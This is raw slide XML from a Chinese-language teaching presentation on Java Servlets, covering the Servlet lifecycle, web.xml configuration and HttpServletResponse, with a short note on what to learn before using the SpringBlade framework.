                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>service() </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>方法检查 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>HTTP </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>请求类型（</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>GET</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>POST</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>PUT</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>DELETE </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>等），并在适当的时候调用 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>doGet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>doPost</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>doPut</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-GB" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>，</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>doDelete</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Destroy</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="ü"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>仅执行一次，在服务器端停止且卸载</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>时执行该方法</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="ü"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>当</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>对象退出生命周期时，负责释放占用的资源</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="817245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="ü"/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="矩形: 对角圆角 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1679144"/>
                <a:ext cx="1662541" cy="355474"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 30835"/>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生命周期</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN"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4" name="Shape 2375"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1049032" y="1616556"/>
              <a:ext cx="234217" cy="139729"/>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bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:noFill/>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solidFill>
                  <a:srgbClr val="F4B246"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543560" y="1918300"/>
            <a:ext cx="11104875" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Servlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>生命周期可被定义为从创建直到毁灭的整个过程。以下是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Servlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>遵循的过程： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Servlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>通过调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>方法进行初始化。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Servlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>service() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>方法来处理客户端的请求。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Servlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>通过调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>destroy() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>方法终止（结束）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="灯片编号占位符 7"/>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学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>方法</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41300" y="1214120"/>
            <a:ext cx="11170285" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框架我需要知道哪些基本的知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框架是一个前后端分离的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框架系统：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前端分为两个大版本一个是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框架开发的另一个是用react框架进行开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后端分为单机版也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Springboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本，和微服务版也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据以上的框架基本信息，我们需要学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Springboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、以及前端的框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</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后端开发</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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289367" y="1859339"/>
            <a:ext cx="10844859" cy="2839880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>在web.xml中配置HelloWorld Servlet</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>servlet节点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>servlet-name:设置servlet的name</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>servlet-class:设置servlet的全包名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>servlet-mapping节点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>servlet-name:servlet节点已经设置好的name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>url-pattern:访问地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>servlet节点与servlet-mapping节点应该是一对，一个定义servlet，一个定义访问地址，一个编写好的servlet可以在web.xm中注册多次，以设置多个启动参数，多个访问地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370390" y="1239748"/>
            <a:ext cx="10749599"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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>配置</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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238491" y="1608881"/>
            <a:ext cx="184731"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866171" y="1362657"/>
            <a:ext cx="4134092" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>HttpServletResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="zh-CN" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="表格 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="866171" y="1978213"/>
          <a:ext cx="4759405" cy="4335886"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4759405"/>
              </a:tblGrid>
              <a:tr h="431198">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>方法</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>描述</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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F81BD"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="461322">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
